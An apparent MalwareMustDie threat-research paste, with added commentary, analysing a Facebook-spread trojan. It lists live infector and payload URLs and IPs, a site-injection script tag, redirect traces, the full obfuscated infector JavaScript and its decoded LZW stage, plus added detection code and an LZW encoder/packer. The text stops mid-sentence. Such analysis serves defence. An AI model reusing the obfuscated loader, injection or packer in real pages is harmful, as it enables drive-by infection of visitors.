MalwareMustDie

FaceBook IM & Web Driven Facebook Trojan with DGA Downloader

Nov 7th, 2013
// #MalwareMUSTDie!
// FaceBook IM & Web Driven Facebook Trojan with DGA Downloader
// Infector: 67.228.248.34 (kemslispragmatic.com)...
// Payload Mothership: 103.246.115.238
// Block Mitigation String (PAYLOAD)= "best.lt.ua/dlimage4.php"
// Block Mitigation String (Infector) = "/hwaf.html?h="

// This research was conducted by MalwareMustDie, NPO.
// An openly shared material; it can and is welcome to be used
// for your threat awareness.
// But please mention it if you refer to this in your
// official blog/writing. With thanks in advance - @unixfreaxjp -

// Special thanks to URLQuery and VirusTotal; with your dedicated great service we can detect "EVERYTHING" :-)

@unixfreaxjp /malware]$ date
Fri Nov  8 06:26:19 JST 2013

=========================
INFECTION ROUTE #1:
FACEBOOK LINKS
=========================

   6/39 2013-07-16 01:24:06
   [100]http://olivechurchministry.com/ocef.html?h=2282017
   5/39 2013-07-16 01:24:06
   [101]http://olivechurchministry.com/ovdt.html?h=2594522
   5/39 2013-07-16 01:24:05
   [102]http://olivechurchministry.com/zwmd.html?i=629980
   5/39 2013-07-16 01:24:06
   [103]http://olivechurchministry.com/zlnv.html?i=2382766
   5/39 2013-07-16 01:24:05
   [104]http://olivechurchministry.com/zwmd.html?h=744758
   7/39 2013-07-16 01:23:54

=========================
INFECTION ROUTE #2:
INFECTED SITES
=========================

// check

http://www.speedway.ne.jp/%7Esaburo/


// injected...

[...]
</table><!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script><!--/339810-->
[...]
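// To turn the injection above into something a responder can run over crawled
// pages, here is an added example (not MalwareMustDie's code). It looks for the
// shape of the inject seen on the compromised site: a numeric comment pair
// <!--NNNNNN--> ... <!--/NNNNNN--> bracketing the block, the sentinel
// `var gwloaded = false;`, and a <script src=...> pointing at a third-party host.
// The sample HTML is constructed for the test and nothing is fetched.

```javascript
// Added example, not from the MalwareMustDie paste. Scans fetched HTML for
// the injection pattern observed on the infected page and extracts the
// hosts that would go on a proxy/DNS block list. Runs offline.

const WRAPPER_RE = /<!--(\d+)-->([\s\S]*?)<!--\/\1-->/g;
const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
const SENTINEL_RE = /\bvar\s+gwloaded\s*=\s*false\b/;

// One record per bracketed block: the numeric marker, whether the
// `gwloaded` sentinel is inside it, the external script URLs and hostnames.
function findInjections(html) {
  const found = [];
  for (const m of html.matchAll(WRAPPER_RE)) {
    const [, marker, body] = m;
    const srcs = Array.from(body.matchAll(SCRIPT_SRC_RE), s => s[1]);
    found.push({
      marker,
      sentinel: SENTINEL_RE.test(body),
      srcs,
      hosts: srcs.map(u => new URL(u).hostname),
    });
  }
  return found;
}

// Deduplicated hostnames loaded from inside injected blocks. Scripts that
// sit outside a marker pair are never counted, so a legitimate CDN tag on
// the same page does not end up on the list.
function blockListFrom(findings) {
  return [...new Set(findings.flatMap(f => f.hosts))];
}

// Constructed sample page: one legitimate external script, then the inject
// exactly as it appeared after </table> on the infected page above.
const SAMPLE_HTML = [
  '<html><head><script src="https://example.org/site.js"></script></head>',
  '<body><table><tr><td>Hello</td></tr>',
  '</table><!--339810--><script type="text/javascript">var gwloaded = false;</script>',
  '<script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script><!--/339810-->',
  '</body></html>',
].join('\n');

// Usage: findInjections(SAMPLE_HTML) -> [{ marker: '339810', sentinel: true,
//   srcs: ['http://9d.home.pl/pub/pOFBT2NP.php'], hosts: ['9d.home.pl'] }]
```

The marker pair is the strongest of the three signals because it survives
changes to the script URL; matching only on `9d.home.pl` would miss the next
redirector, and matching only on the sentinel would miss a variant that renames
the variable.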


// links...

   4/50 2013-11-07 06:52:00 [35]http://9d.home.pl/pub/pOFBT2NP.php
   3/50 2013-11-06 11:59:11 [36]http://9d.home.pl/pub
   1/50 2013-11-06 02:06:16 [37]http://9d.home.pl/pub/pofbt2np.php


// fetch w/o java


--2013-11-08 04:48:52--  http://9d.home.pl/pub/pOFBT2NP.php
Resolving 9d.home.pl (9d.home.pl)... 79.96.233.122
Caching 9d.home.pl => 79.96.233.122
Connecting to 9d.home.pl (9d.home.pl)|79.96.233.122|:80... connected.

---request begin---
GET /pub/pOFBT2NP.php HTTP/1.1
Referer: http://www.speedway.ne.jp/%7Esaburo/
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 301 Moved
Connection: Keep-Alive
Content-Length: 202
Content-Type: text/html
Date: Thu, 07 Nov 2013 19:48:53 GMT
Location: http://kemslispragmatic.com/hwaf.html?h=582878
Server: IdeaWebServer/v0.80

---response end---
301 Moved
Registered socket 3 for persistent reuse.
Location: http://kemslispragmatic.com/hwaf.html?h=582878 [following]
Skipping 202 bytes of body: [<HTML>
<HEAD>

        <TITLE>301 Moved</TITLE>

</HEAD>
<BODY BGCOLOR=#FFFFFF>

        <H1>301 Moved</H1>
        The document has moved <A HREF="http://kemslispragmatic.com/hwaf.html?h=582878">here</A>.

</BODY>
</HTML>
] done.
URI content encoding = None

--2013-11-08 04:48:53--  http://kemslispragmatic.com/hwaf.html?h=582878
conaddr is: 79.96.233.122
Resolving kemslispragmatic.com (kemslispragmatic.com)... 67.228.248.34
Caching kemslispragmatic.com => 67.228.248.34
Found kemslispragmatic.com in host_name_addresses_map (0x288041c0)
Connecting to kemslispragmatic.com (kemslispragmatic.com)|67.228.248.34|:80... connected.

---request begin---
GET /hwaf.html?h=582878 HTTP/1.1
Referer: http://www.speedway.ne.jp/%7Esaburo/
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 404 Not Found
Date: Thu, 07 Nov 2013 19:48:54 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 523
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
[...]

// fetch w/ java

same result.

// check the landing page.

Name:   kemslispragmatic.com
Address: 67.228.248.34

============================
INFECTOR HOST: 67.228.248.34
============================

// domains...

   The server returned the following data:
   [6]kemslispragmatic.com   A   [7]67.228.248.34
   [8]kemslispragmatic.com   NS  [9]ns11.syskay.com
   [10]kemslispragmatic.com  NS  [11]ns12.syskay.com


// Possible variations of the URL, checked (note the ?i= and hlft.html forms below; the infector block string above only covers hwaf.html?h=):

$ ipchk urlq hwaf.html
-----------------------------------------------------------
ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
-----------------------------------------------------------
Infection Record Source : urlq vt
-----------------------------------------------------------
2013-11-07 04:15:56
1 / 1 [7]http://kemslispragmatic.com/hwaf.html?h=582878

2013-11-06 07:07:58
1 / 0 [8]http://kemslispragmatic.com/hwaf.html?h=582878

2013-11-06 07:06:25
0 / 0 [9]http://kemslispragmatic.com/hwaf.html?h=58287

2013-10-31 18:18:31
1 / 1 [10]http://kemslispragmatic.com/hwaf.html?h=582878

2013-10-31 15:44:52
1 / 1 [11]http://kemslispragmatic.com/hwaf.html?h=582878

2013-10-30 21:49:11
1 / 1 [12]http://kemslispragmatic.com/hwaf.html?h=582878

2/50 2013-11-06 06:07:10
   [56]http://kemslispragmatic.com/hwaf.html?h=582878

1/39 2013-09-17 11:02:59
   [64]http://kemslispragmatic.com/hlft.html?i=3343031

1/39 2013-07-21 18:58:02
   [89]http://kemslispragmatic.com/hwaf.html?i=3204044


===========================
INFECTOR HTML
===========================

// fetched sample's codes:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta http-equiv='
x-ua-compatible' content='EmulateIE9'><script>l1l=document.all;var f9f76ca8b6=true;ll1=docum
ent.layers;lll=window.sidebar;f9f76ca8b6=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.us
erAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')
|lI1('per');f9f76ca8b6|=lII;n6V6vun=new Array();n6V6vun[0]='%68c%65\170\131%38\105\171%67%4D
nP%36\156%62'    ;p2oWy1B=new Array();p2oWy1B[0]=' <HTML><head~script>e
val(une~\rape(\'\\166ar%20q%79%37~/D~(~12~13B~+~-~/8~2%5
3t~,2ing~(Ef~C~"57~L5C%68a~CCod~"45~(~=31~/3~(~Q~_~/0~(~.~8~R6~RF~
C~]i~>3~g~8~q3~d2~/~y~0~/~iB~L~`2B~(}2~.7~9~,~i~5}3D~"6~`~;3~=7~3~8fu~L~l
6~A}za~m}~(~*y~/~l2~=}~,~15~`~$~]~(}.4~L~1}}},~\\6}9E~B2E~Z1l~R~Q})}d~mc}
5me}}=Ew}~D~,4~R~\\}\'}1~"7~`~|}E~3}~/}}\\}$3}&}(~~f}Jn~Z3}}3},1o}!~)~:
~i~.}\'~h}*}[2}3~i~32~{Cs~(~y}|p}@~RE}"~,~b74yle~>~6~R}p}-s|\n},}p41}eAn
o~~4~/|\r~w}~g7~y}:|\'|}~,}} |1|~/}D~n70r~Z~\\3|(|8}~b|6||pan|/|6~j7A~v~
{~36Eew}"~"0}~y|,~R| }0~6}@ft|=rB|67~E|&2}D}52}M146}4}R|o05n}G||k~4| ~
$te|<1|v| ||j|l~R|-5}j},~N~#}}|p~\\4|n~R}59|I|z~~~,|N~a~>|R|o|g}"A~\'|,a}[}}({\r5
0|b}8~L}U|z|lh}V~\n{~4b|s|p||j~~~Z}|9|8k~r~t}6}\r~dDz}~|CE}B}:~F{,{*}b~L|C}}
}}+|,~v}U}|{84|}K}V| }O~G|.|%~[{.|o55|=}l~#}U7~b{}\nT{%|p~14Eam|=~]z~R~i~b
5B{B5|{<|p{>}R~]j{C{S},|~>|M{[~H}C{|Rg}o{2~8~L|{V}z}fo~\'}\'~v}{D~v{H{~u|5{W}*z
~J}X1{Z~/}Uz~RA~?z  }*zzzzzz69}s|=z\r||W}Z{9j{x{`}V}NH~?}U4}1|pzza}~~yz}
zC|kzzE~}z"}`zf~,zg~8\'))</~\r~~~ ~~~n|=\'Old brows{za!\';dl=
docu}Lnt.lay{zas;oe=w~Ey w.o~ra?1:0yay\ny yey.~l&&!y;
gyy y\ryyy8t{Mey<ById;yyyy.sideb~&?true:f~y;tN=navig
atz%.uyrAy8y/yfLy{zaCay();izy^y].yexOf~ ~t~~zk>=0ySyUyWyYly[z?
s=y|y~xzax\'myMe 7xx\nx yVyXyZe;x8xNy}|xyx~ xix8xx yTx"xxis|=x\'
yxxyy3!yyN){quogy \'iuy\'};~r xgzyy}ncti|$ ~myv{return
 x6exRy|xyK|${zayzaxU=xayAx&OFyIxqyly yex_n.pyzayfcolx+yOx("fi|")!=
-1x!xx$yx7fx=x:xBzx{wx#xx%ixdaxFy:y-y/|$dy#gst~&t=x[x]w xdxfxhxj x8xn;w
:x^x`cIExd(xWyww?xixkwCxRwFw<ccxdw.y<y x\\|$|xtyu=wIE;ytTi}LoutwwWyv"
,~)0)xRwqwwwE~w;wHNS(exFw)(y||yvxe.which==2vv vvv=3xFwMsgwO
xgwQwBx$}v&x?vlw-y,w[c~w@eEvy.x(v2v4.MOUSEDOWxEyv,v8|$mwmyynwdw}e
w\'{wZvEnvGyieupvLSxRvRw0w]yyway.wc~w Fw|wGnwwPwAwCwv(yxFwUx`yzavv\nvv3y/
bwnyfvKvxF~{zawo\' zk;vmxk0xRu    xlx\rv\\vDv^vUvIyvKyzawTviw<zw9xdxpyyLw6xhxuywhwj
wlwnxsu)\',{0wvuv"wAxmxRvy5v{uyvvCy;vSueov3ry_u+u>w/yvFvHuBwnuF9ux\\vj
u0(w,xeu4wRv%w{uRw<u1vwuYw@vkv w6ry>.w6gN{}ewnuly'    ;cn7Nje='fu'    ;aF8PX7b
='h1Pphs'    ;vjtc7xF71='OuRaGIuGOOBqOjOESFEO'    ;cn7Nje+='nction cHv346q'+'w049m0JYj(kRHf0
4n8u65'+'nG5ePB1){'    ;qxZS473XYJ7R43='\166%61%72%20\154%32%3D\167i\156%64%6F\167%2Eo%70\14
5r\141%3F%31%3A%30%3B%66u\156ct%69\157n%20l%36b%38%61%63%36%37%66%39f%28%29%7Bi%66%28f%39\14
6%37%36%63a%38\142%36%29%7B%64o\143u\155%65n%74%2E\167r\151te%28%6C\117%29%7D%7D%3Bf%75n%63t
i\157n%20%6C%33%28%6C%34%29%7B\154%35%3D%2F%7A\141%2Fg%3B%6C%36%3D%53t\162\151%6E%67%2E\146%
72o%6D\103%68\141\162%43\157d%65%28%30%29%3B\154%34%3D%6C%34%2E\162epl\141%63e%28l%35%2Cl%36
%29%3Bv%61\162%20l%37%3Dnew%20A\162r\141\171%28%29%2Cl%38%3D%5F%31%3Dl%34%2Elen%67%74h%2C%6C
%39%2C%6CI%2C%69\154%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2C%6Ci%3D%27%27%3B\144%6F%7B
%6C%39%3D\154%34%2Echa\162C%6Fd%65\101t%28%5F%31%29%3BlI%3D%6C%34%2E\143\150\141%72C%6Fd%65A
t%28%2B%2B%5F%31%29%3B\154%37%5B\111%2B'    ;function w049m0JYjcHv346q(iCdIME){vjtc7xF71+=iC
dIME};n6V6vun[0]+='y%61%36\156%55%75%34%37%34'    ;p2oWy1B[0]+='2&uf~&uiukum}LyL~  rv~ ^
(INPUT|TEXTAREA|BtTON|v=LECt~~)$zkwwwzvtxku2ubvvvvv1x
FuyKv.~xiv1vzv5v7y/v:v<Ev:VEywt1yuKvVvGv3=uUv\'t%uT3t)v v\rt,vt/{tB.xf|ytt6v4sv
6t7v9v;v=t>t@yGyJtCvTuLtFyuqusv\' vyt0te.t3v0t9t8t^t;v=UP|tvt_t<v?vAtAtrtDuwvKt\'t
dx~w\\uAvXtH3vNw\'tnxy8xBw+v+u?uuLvJtH1uQw}xknvkvxtUy>SvOes xFxTxlx}us&s(s yvujoSy
T~Egu=vyxx.\'qw~ sdzxcx1vy|{Ph>4wvvQuyb~Xyx+~rtLzy.ywzav.vjtVv
Oo~\nyvxRu&wkuMwo"s"wrwtu1wwxRsnywtKnixdtouXv]uJzws1xugw8tKw>uZv$w\'shxgu\'skwswsowusr
;r\rywszxByxBiwvsczy<\'+\'div w5|y"poyMvj:absw\nwnx%||a:wu10pxy\
\y!r6u0r9r;ydth:6r@;~ycht:35r:x&-x:1">r\'rr~Epwnxly~="v|tv~"xa
unrcxqqrh~lyVrcrh|$Clvkwdcdyvr$tr&rcybyMbwir:vdyOnrWr[\'/r!vrXuHw[w~
|(fcsuuwHr{xdcrwpsU~&dDyeatstXrq\'w6sgu]s  wW~xFrlqq*rxu=siu(slq3so~swvrwisj
wmq=cq4wsq@qAv(x\'tqs yew6vtv~ |$wza~\nu.qy9wzznzpzuzszqttndzyuslI\'>s,ppw   nw
y(s,qY7xY;qYx(s6~~F.fyzamCh~&~WyO(13u/0u/p{suz%(ix\nyx<4|:yx++xFqs+=qw
xRqg1Irc<"+"!--p$p"p(p$rW";Ip21rc/p.*p*y7p%p8p%p6p1qfp"zpp.q_p$qgp2p)+
pGI(2pJ"zypFp2pMvp%rZzoztp.zrp0lp p!"<sp[|Hr~qzar x:pyy:|#~qi<we>p9p;pa/p
r~zopdnpt;p^Iy  ozaIpKIp pKp_p@zYp"p.||Hp~op^p"p6p%op}p0oopao\r|Gxkr%|zyqiqrwq
q  q qis@sBsDsFp$o1q0uSp^p xdoo ve {"y#y~ bez$xf|eg~Eu.\'a|a{zaoBoD,\'o>o@v1|xoE
oG|rEoQywop y_|To9ro;~ rLmloE~qWoLsUdxPoLaoEwkgoEqoEo@moEw6b|oEq^~omnr^toE
pupGp4ozauaywsytunxFv.y y&pTp!o8o:y(~-,nnp{snnnnn!{sywz~    k;nx2:no
[vfno<},pn37u/5n31n7,9n<wt2n;},n$xfan\'n) 3n,pTn.o]o_p n2n2},n>nRn=n=|nA5nCn&
n(tY 4nJp2nLn0(n2n4n4nR|n;nUn?nXnZnEyo?aurrMn-no^np ny,nzn|n{n~qKpGy   nvo_pI,pTn:
ol,om p m oYm   }Am ust/p1zY~s|.y>y@y<syC{wuluntoza[2])[0]wtm p2l[7m(wEpw8y
(t<oYIyy.grDy\\pxFm=n[t]mqgy+sy=xgmt[m am"}Lm$p mFm3x]as\\om;sLm>hm4r(
jpj<mYL;jmA{o@(xpxp;xmlvm&MyehwypN,xzl{o6~m\\[jm,xm.o[m>l4
m(v&v\'opMoX}A~ywqflpoq:r  qDu)\'o3lu.r?t$qxklxds,o6p!mwkmR~mm/mKuIy~Eks,wmD
zYm]m=rDm y pTw m^lBqfo0v|pv*lp^y   m~~   |mOy~ onml>mVp(wmHu8(qlqnf&pOxFyTylO}A
y0qly.dpzawr|lIw~&v4N~Xv xfpjaqGlqz|mUm lIzl}sauu:lyGvlLusxFoYlQsStsnDlU|y<lXolZo
lE[p(usl`x!lbqm|$let/lhrljklm~|xllsmluxfylxyOscl|l~k r|klCp^kkhublsuSoltTs
k,y_urlqvEkItkkLtUurw8kP;kCw<ll,~& vay#vhx\\1Cyyx\nkXx`pkFs,k^ak`c|kkdm6kg'
  ;cn7Nje+='eva'    ;yulH3LhUKQoX741='ErsxrjlLDylFsLTN'    ;cn7Nje+='l(unes'    ;cjX6ODk='pc
565f485'    ;cn7Nje+='cape(kRHf04n8u65nG5ePB1))}'    ;eval(cn7Nje);i9uWnudk54='CWuJtOOvcgjYg
JOlwOyp'    ;cn7Nje=''    ;qxZS473XYJ7R43+='%2B%5D%3D\154\111%2Bi%6C%2D%28l%39%3C%3C%37%29%7
D%77%68%69%6C%65%28%5F%31%2B%2B%3C\154%38%29%3Bva%72%20l%31%3D%6E\145w%20Arra\171%28%29%2Cl%
30%3D\156e\167%20\101\162\162a\171%28%29%2C%49l%3D%31%32%38%3B\144o%7B\154%30%5B\111\154%5D%
3D%53tr%69n%67%2E\146ro%6D%43%68\141%72\103\157d\145%28I%6C%29%7D\167hi%6C\145%28%2D%2D%49l%
29%3BI%6C%3D%31%32%38%3Bl%31%5B%30%5D%3Dl\151%3D%6C%30%5Bl%37%5B%30%5D%5D%3B\154l%3Dl%37%5B%
30%5D%3B%5Fl%3D%31%3Bv\141r%20\154%5F%3Dl%37%2E%6Cen\147t\150%2D%31%3B%77%68i\154\145%28%5F\
154%3Cl%5F%29%7Bswi\164%63h%28l%37%5B%5F\154%5D%3CIl%3F%31%3A%30%29%7Bca\163%65%20%30%20%3Al
%30%5BI%6C%5D%3D%6C%30%5Bl%6C%5D%2BS%74\162i\156%67%28l%30%5Bll%5D%29%2E\163u%62str%28%30%2C
%31%29%3B\154%31%5B%5F\154%5D%3D\154%30%5B\111l'    ;</script><script>eval(unescape('f%75nct
ion%20n%39%37%51%42\125%20%20%20%20%28\165\113%34%6A\150\120Ga%36M%32%6CdH%31%29%7Br%34%30%3
2%35%6A\113%6A\126\123j\143%3D\165%4B%34\152h\120Ga%36M%32%6Cd\110%31%7D%3B'));rnNhBrLtGtlNy
='l'    ;cjX6ODk+='p7uK6vc4zv2Adhe'    ;p2oWy1B[0]+='l*mv,p,q{li{u8tUyMyOyQrxFv ~Ey
jtAdzOqGys[tzY1[pm,qsnxecwlRkeR|Hy8s3lSyee~Wv`w`u~Fw3kqv(vYx\njk1lwly
x+j|eoO(u~f,vu7xj/tSjs~kTj7z%~j:j<q|irw5k.wzvj/pO{v ~k,lpk9j9jjOj?vvjSj2k3j4
jujExfjYj;v ~w`So#rw~FsrkyeuxuuxFtJl) pLmcxFuEmzrDtV|Hy xcywqdo8q-q4ml mTrxmd=
tSo=qys8q|q~pzaply(jm|fwzapr*25+}:kvOjiiq|imbi!d*l\'ryopoyi6i8=oj
>mcj]xFi5i;i:i<u3ud iDs;rauBf kRq\ntvLx:|sYw\'~yOw~dzkkGqOiOt7iQw5y.{za~ qVi[mp
,wCwwi(xiI~oiLm~\ndiPiRicriUiWo?~Eei[sl7itivibsYieseigo3mikjinxripiLkRrfl}htvi
zx,iYi~i\\hqQht7qTnifu.h l(u^khp n{npvdyaycyeygvVykymyyoyqrysyui\r(kyNyP~&xFh+2i
=tUvq~u:h+sv(tUy!{zauXh+4i=isusy3nw=4hAp3ii=uw x-xsoG~&isHhZovi=(h+i)y3~h_
wxMx{hfhgp4{u rn}q]ztzr~zaoz~tKl$xdk|o3p4mmkv4yCyEieusqhljj`y]j4xftik.hkjwwk?v
o^j{v&h~qa~TITt>Fl}yPookzng\'g)E~MEt  NAg7rcGixh0rrhCtt   NTrcg,qGsU
g0tsomq\rg7g9g;g="Awnhz%gCgEEgGgIg-gLkgNgPg6g8Ag:g<ErcKeywz%dpc gDgGg]gH"Wy
,jzw\ng{asAr0}Lg{w   w\ngQgfghgUD~hvjg[gug^gxy! Hyaxywmk]uDr$ey.?q\rjnk tWrcs
gYkTy\rqbv|$rhhxfw"rLtp://fr/u!v-q)nE{}aihd.x/jLu~whp/yPfF/Ivn
-CVe5TGKy}w  rh/pzHtD~BODY>gf r`rb\'w_t/zO~gqitKy#xqmi~FhklAhs+k\\v
~&u#r.r{o?gvklm|#pqjLxhvwxyz\'yLpjq~ uu8lGf~h*f}=i+ig/mbi+fwiyv*ejLm<sM
wzs,w5uE\'xZps,py(i<epp{e1pe+s[e"i-im{ifxe)eAe-m_)]hziFe1ks ymDgOf@s#{e0i
zyf2f4f6re\'gOfzs96pJeo>w5yyj(qrwml24fIp?eaiecs7f{pOrzy+ebfyeys9hYkMy/qq~rZ
w)y#}Lr$u~rcrsCgOrrhrBrDrc0f-erKw8"dwBd g.ryOuEdq\r/d\nunrXywxReUeW~Eyvg$q_~zaov|i
MyNd"u0%ddrcd:rhsUd"{zadrhqGusocs8dDq2vOl|Gq\ndJd% ~ycvK"j oTq\rtohy~yTz~gw
wzad$#~85998d<ed8dd^z}dTgdVr4trodrdVdX{zaq\rIMG SRCrce^f5f7f9wcf<y0kf?f
AfCfEfGces/v2fLX/x/Qq6L1pQrYrw~FrhfeRDERdKALgwd&t~ znyTd^xUbdaw\n
z%rc#E7EBF2dZdqrwdsrcdzgB rpdUcJv4d{~z$yv$qGrcrqdIw+eTe\'e,w6gYep,uDw+y`,hd~d
Ec<dd0E}5FrhyMzr\'+4q\rB>eVsifdS|xk]xs)r2xl~cVg.g0dSqlg{pjsBuo Yfyusz~xsx
iwx:i~ :zm/cyzncT~c6c5/c7<d_c:dbc="c?cAcCcEdpdScHdycQcLcNcI"yfpq\rb!bcXucZac\\i
c^c`eWcc{zaceacg~ciq2ckc>3bRbSrWbxi vJc}f&wmz|br~w7s8tnxk2fqngq.bhb w^fdRbl~ggH
tx|"frytf :ms`w|$.f.o?l6w[bzsbb~f;b<w^b>"cYyNbBgc]c_acabKcd|HbKchlcjdcc>cmcocqfd
>IiLfbWbYhbXysnfnb_kTb tXnq!rx ~xfznbf7bkznApzc4a<ra<d\\a<r.|fipbfkhyfnvafqy
abvqaqiki r "bywaf/e]rfe_/ycki~l{z%yw  otws1wusqd1gzaa6fffhzns[>'    ;w049m0JYjcHv
346q('j4VG01D212');qxZS473XYJ7R43+='%5D%3Bif%28l%32%29%7B%6Ci%2B%3D%6C%30%5BIl%5D%7D%3B%62re
%61k%3Bd%65f\141%75\154\164%3A\154%31%5B%5F\154%5D%3Dl%30%5B%6C%37%5B%5F%6C%5D%5D%3B%69%66%2
8l%32%29%7B%6C\151%2B%3D\154%30%5B%6C%37%5B%5Fl%5D%5D%7D%3B\154%30%5BI\154%5D%3Dl%30%5B\154l
%5D%2BS%74%72\151ng%28l%30%5Bl%37%5B%5F\154%5D%5D%29%2Es%75%62\163t\162%28%30%2C%31%29%3B%62
%72e\141\153%7D%3B%49%6C%2B%2B%3Bll%3D%6C%37%5B%5Fl%5D%3B%5F%6C%2B%2B%7D%3Bi%66%28%21\154%32
%29%7Br\145%74urn%28\154%31%2E\152oin%28%27%27%29%29%7D\145\154se%7B%72et%75%72\156%20%6Ci%7
D%7D%3B%76a%72%20lO%3D%27%27%3B\146%6Fr%28\151%69%3D%30%3B%69%69%3C%70%32o%57y%31%42%2E\154e
\156\147t\150%3Bi%69%2B%2B%29%7BlO%2B%3D\154%33%28p%32%6F%57\171%31\102%5B\151i%5D%29%7D%3B\
154%36\142%38\141\143%36%37f%39%66%28%29%3B'    ;i9uWnudk54      ='OOhrEONOvMjmgCTBHfvBtHNTj
OsX'    ;qF7u2oYdq1wbJ='kI03H2w13x'    ;w049m0JYjcHv346q    (yulH3LhUKQoX741);cHv346qw049m0J
Yj (qxZS473XYJ7R43);n97QBU  (qxZS473XYJ7R43);o38iRr2IxdH5Wn8='vjDJ5wc2fj0fy3H3es7e7DDy'    ;
eval(unescape('%71%79%36%28%29%3B'));rnNhBrLtGtlNy+='rhmQEknosQONOwmOjwVRgvMfPaYBOGQRPPfnLOO
OuDdOOGyEQMpHOhUCnuXp'    ;cjX6ODk+='s9CJ8bJ8'    ;</script></head><body></body></html>

// Decoded first step:

// Browser gate: f9f76ca8b6 is computed by the outer script from document.all,
// document.layers, window.sidebar and the user agent; lO is only written if it passed.
var l2 = window.opera ? 1 : 0;
function l6b8ac67f9f()
{
  if (f9f76ca8b6)
  {
    document.write(lO)
  }
};
// LZW decoder. In the packed string every NUL byte is spelled as the two letters
// "za"; each code is a character pair (hi, lo) with code = lo + 16256 - (hi << 7);
// the dictionary is seeded with the single characters 1..127 and grows from 128.
function l3(l4)
{
  l5 = /za/g;
  l6 = String.fromCharCode(0);
  l4 = l4.replace(l5, l6);
  var l7 = new Array(), l8 = _1 = l4.length, l9, lI, il = 16256, _1 = 0, I = 0, li = '';
  do
  {
    l9 = l4.charCodeAt(_1);
    lI = l4.charCodeAt(++_1);
    l7[I++] = lI + il - (l9 << 7)
  }
  while (_1++ < l8);
  var l1 = new Array(), l0 = new Array(), Il = 128;
  do
  {
    l0[Il] = String.fromCharCode(Il)
  }
  while (--Il);
  Il = 128;
  l1[0] = li = l0[l7[0]];
  ll = l7[0];
  _l = 1;
  var l_ = l7.length - 1;   // the last entry is a NaN from reading past the end; skip it
  while (_l < l_)
  {
    switch (l7[_l] < Il ? 1 : 0)
    {
      case 0:   // code not in the dictionary yet: it is prev + first char of prev
        l0[Il] = l0[ll] + String(l0[ll]).substr(0, 1);
        l1[_l] = l0[Il];
        if (l2)
        {
          li += l0[Il]
        };
        break;
      default:  // known code: emit it and add prev + its first char
        l1[_l] = l0[l7[_l]];
        if (l2)
        {
          li += l0[l7[_l]]
        };
        l0[Il] = l0[ll] + String(l0[l7[_l]]).substr(0, 1);
        break
    };
    Il++;
    ll = l7[_l];
    _l++
  };
  if (!l2)
  {
    return (l1.join(''))
  }
  else
  {
    return li
  }
};
var lO = '';
for (ii = 0; ii < p2oWy1B.length; ii++)
{
  lO += l3(p2oWy1B[ii])
};
l6b8ac67f9f();
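// The decoder above is plain LZW with a 7-bit seed alphabet and a two-character
// code packing. To decode p2oWy1B-style strings offline, and to confirm the
// reading of the scheme by round-tripping, here is an added example (not the
// author's code and not from the sample): a readable port of l3() plus the
// matching encoder. The test text is constructed.

```javascript
// Added example, not from the MalwareMustDie paste. Port of the sample's
// l3() LZW decoder plus the inverse encoder/packer so the scheme can be
// exercised offline. Scheme, as read from the decoded first step:
//   - dictionary pre-seeded with single characters 1..127, new entries from 128
//   - each code stored as a character pair (hi, lo): code = lo + 16256 - (hi << 7)
//   - every NUL in the pair stream is written as the two letters "za"

const BASE = 16256;        // 127 << 7
const FIRST_NEW = 128;     // first dictionary index assigned at run time

// Pair stream -> integer codes (the original reads one pair per loop turn).
function pairsToCodes(s) {
  const codes = [];
  for (let i = 0; i + 1 < s.length; i += 2) {
    codes.push(s.charCodeAt(i + 1) + BASE - (s.charCodeAt(i) << 7));
  }
  return codes;
}

// Faithful decode of one packed chunk (what l3() does for one p2oWy1B element).
function lzwDecode(packed) {
  const codes = pairsToCodes(packed.replace(/za/g, '\0'));
  if (codes.length === 0) return '';
  const dict = [];
  for (let i = 1; i < 128; i++) dict[i] = String.fromCharCode(i);
  let next = FIRST_NEW;
  let prev = codes[0];
  const out = [dict[prev]];
  for (let k = 1; k < codes.length; k++) {
    const c = codes[k];
    // c >= next is the KwKwK case: the code being defined right now
    const entry = c < next ? dict[c] : dict[prev] + dict[prev][0];
    out.push(entry);
    dict[next++] = dict[prev] + entry[0];
    prev = c;
  }
  return out.join('');
}

// Mirror of the lO loop: decode every chunk and concatenate.
function decodeChunks(chunks) {
  return chunks.map(lzwDecode).join('');
}

// Standard LZW encoder over the same seed alphabet; returns integer codes.
function lzwEncode(text) {
  const dict = new Map();
  for (let i = 1; i < 128; i++) dict.set(String.fromCharCode(i), i);
  let next = FIRST_NEW;
  const codes = [];
  let w = '';
  for (const ch of text) {
    const cc = ch.charCodeAt(0);
    if (cc === 0 || cc > 127) throw new Error('scheme carries 7-bit non-NUL text only');
    const wc = w + ch;
    if (dict.has(wc)) { w = wc; continue; }
    codes.push(dict.get(w));
    dict.set(wc, next++);
    w = ch;
  }
  if (w) codes.push(dict.get(w));
  return codes;
}

// Inverse of pairsToCodes: hi = 127 - (code >> 7), lo = code & 127.
function codesToPairs(codes) {
  let s = '';
  for (const c of codes) {
    if (c < 0 || c >= 128 * 128) throw new Error('code out of range for the pair encoding');
    s += String.fromCharCode(127 - (c >> 7), c & 127);
  }
  return s;
}

// Full packer. The decoder replaces every "za" blindly, so a pair stream that
// happens to contain a literal "za" cannot be represented; refuse it.
function pack(text) {
  const raw = codesToPairs(lzwEncode(text));
  if (raw.includes('za')) throw new Error('pair stream contains a literal "za"');
  return raw.replace(/\0/g, 'za');
}
```

With small inputs the high character is always `~` (0x7E) or DEL (0x7F), which
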